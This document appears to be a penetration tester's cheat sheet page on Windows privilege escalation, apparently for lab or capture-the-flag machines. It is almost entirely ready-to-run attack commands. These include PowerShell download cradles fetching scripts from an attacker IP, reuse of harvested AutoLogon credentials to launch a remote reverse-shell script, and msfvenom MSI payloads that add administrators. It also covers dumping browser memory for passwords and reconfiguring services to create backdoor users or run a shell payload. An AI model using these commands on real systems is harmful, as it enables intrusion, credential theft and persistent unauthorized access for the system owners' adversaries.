Privesc Openings

Windows Exploiter Suggester

# https://github.com/bitsadmin/wesng

# 1. Copy and paste into system.txt in kali
Systeminfo	

# 2. Update windows exploit suggester. Will generate a .xls file 
python windows-exploit-suggester.py --update	

# 3. Start suggesting an exploit
python windows-exploit-suggester.py --database <generated xls> --systeminfo system.txt

Sherlock

Find All Vulns

# find-allvulns 1
IEX(New-Object Net.WebClient).downloadString('http://10.10.14.32/Sherlock.ps1')	
find-allvulns

# find-allvulns 2
powershell.exe -exec bypass -Command "& {Import-Module .\Sherlock.ps1; find-allvulns}"

PowerUp Invoke-AllChecks

# Start powershell
powershell.exe -exec bypass	

# Download powerup
(New-Object Net.WebClient).DownloadFile('http://10.10.14.32/PowerUp.ps1','C:\Users\Destination\Folder\PowerUp.ps1')	

# Import script
Import-Module .\PowerUp.ps1	

# Start checks
Invoke-AllChecks

Alternatively

# Download
powershell (new-object net.webclient).downloadfile('http://10.10.14.32/PowerUp.ps1','C:\Users\tolis\Videos\PowerUp.ps1')

# Import Module
powershell Import-Module .\PowerUp.ps1

# start Checks
Powershell Invoke-AllChecks

# oneliner to start checks
powershell.exe -exec bypass -Command "& {Import-Module .\PowerUp.ps1; Invoke-AllChecks}"

DLL Hijacking (PowerUp)

# With powershell/Powerup
Find-ProcessDLLHijack
Find-PathDLLHijack
Write-HijackDll

Dump Process

Dump process (eg. Browser) to find credentials . Transfer to kali and 'Strings' grep for login or passwords

# powershell 
Get-Process firefox

# Kali
.\procdump64.exe -accepteula -ma <PID> <DumpName.dmp>

Strings <DumpName.dmp> | grep login
Strings <DumpName.dmp> | grep password

Using Token and AutoLogon creds

PowerUp Invoke-AllCheck should find plaintext pass . Create privilege object to run reverse shell.

# With powershell/Powerup
Get-RegistryAutoLogon

#Create credential object
$SecPass = ConvertTo-SecureString 'Welcome1!' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('administrator',$SecPass)

# Call reverse shell using credentials
Start-Process -FilePath "powershell" -argumentlist "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.32/HackedAgain.ps1')" -Credential $cred

AlwaysInstallElevated

Always Install Elevated to create privesc user after installation.

# for HKCU registry
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

# or HKLM registry
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

# With powershell/PowerUp)
Import-Module Privesc
Get-RegistryAlwaysInstallElevated


# Create msfvenom setup file
msfvenom -p windows/exec CMD='net localgroup administrators user /add' -f msi-nouac -o setup.msi

#Run in victim machine
msiexec /quiet /qn /i setup.msi

ICALCS

Look for Folder permissions for (W) permissions. Overwrite with binary payload . For WinXP and Below: use cacls

icacls "C:\Program Files (x86)\Program Folder"

WMIC

Syntax

Description

wmic qfe getCaption,Description,HotFixID,InstalledOn

Any missing patches

Check for exploits in exploit-db eg.:

searchsploit MS16 windows local

wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB979682"

Windows Vista/2008 6.1.6000 x32,Windows Vista/2008 6.1.6001 x32,Windows 7 6.2.7600 x32,Windows 7/2008 R2 6.2.7600 x64. (no good exploit - unlikely Microsoft Windows Vista/7 - Elevation of Privileges (UAC Bypass))

wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB2393802"

Stored Credentials

wmic os get osarchitecture || echo %PROCESSOR_ARCHITECTURE%

32 or 64bit?

wmic useraccount get name, sid

Get list of user account names and SID

wmic logicaldisk get caption || fsutil fsinfo drives

List drives

Unquoted Service Paths

Privesc by uploading binary payload in service path to be executed eg. By service start/stop or reboot. How? Suppose we found: C:\Program Files (x86)\Program Folder\A Subfolder\Executable.exeIf you look at the registry entry for this service with Regedit you can see the ImagePath value is: C:\Program Files (x86)\Program Folder\A Subfolder\Executable.exe

To be prevent it being exploited, the path should have been: C:\Program Files (x86)\Program Folder\A Subfolder\Executable.exe When Windows attempts to run this service, it will look at the following paths in order and will run the first EXE that it will find in sequence, hitting our exploit payload.

C:\Program.exe
C:\Program Files.exe

C:\Program Files(x86)\Program Folder\A.exe

To discover unquoted service path

# With WMIC
wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """ 

# With powershell/PowerUp
Get-ServiceUnquoted

Writable Path (accesschk.exe > upnphost)

(1) Accesschk for any writable path (2) sc qc to query (3) method1: adding backdoor user to admin group (4) method2: adding binary payload

accesschk.exe -uwcqv "Authenticated Users" * /accepteula
accesschk.exe -qdws "Authenticated Users" C:\Windows\ /accepteula
accesschk.exe -qdws Users C:\Windows\ /accepteula

# Or 

accesschk.exe -wuvc daclsvc /accepteula

Querying Service

# With powershell/PowerUp
Get-ModifiableServiceFile
Get-ModifiableService
Get-ServiceDetail

# Querying service
sc qc <vuln-service>

Method 1: Adding backdoor user to admin group

sc qc <vuln-service>
sc config <vuln-service> binpath= "net user backdoor backdoor123 /add" 
sc stop <vuln-service>
sc start <vuln-service>

sc config <vuln-service> binpath= "net localgroup Administrators backdoor /add" 
sc stop <vuln-service>
sc start <vuln-service>

Method 2: Adding binary payload

sc config upnphost binpath= "C:\Inetpub\ftproot\shell.exe"
sc config upnphost obj= ".\LocalSystem" password= ""
sc config upnphost depend= ""
sc stop upnphost

# run reverse shell listener

net start upnphost

Services Registry

# In Powershell
Get-Acl -Path hklm:\System\CurrentControlSet\services\regsvc | fl

# Cmd
powershell "Get-Acl -Path hklm:\System\CurrentControlSet\services\regsvc | fl"

Create exploit eg. Msfvenom exploit.exe and place in writable folder like 'temp'

reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d c:\temp\exploit.exe /f

Run service sc start regsvc

PreviousBasic checks / powershell NextLonelyPotato - SeImpersonatePrivilege

Last updated 5 years ago

hashtagWindows Exploiter Suggester

hashtagSherlock

hashtagFind All Vulns

hashtagPowerUp Invoke-AllChecks

hashtagAlternatively

hashtagDLL Hijacking (PowerUp)

hashtagDump Process

hashtagUsing Token and AutoLogon creds

hashtagAlwaysInstallElevated

hashtagICALCS

hashtagWMIC

hashtagUnquoted Service Paths

hashtagTo discover unquoted service path

hashtagWritable Path (accesschk.exe > upnphost)

hashtagQuerying Service

hashtagMethod 1: Adding backdoor user to admin group

hashtagMethod 2: Adding binary payload

hashtagServices Registry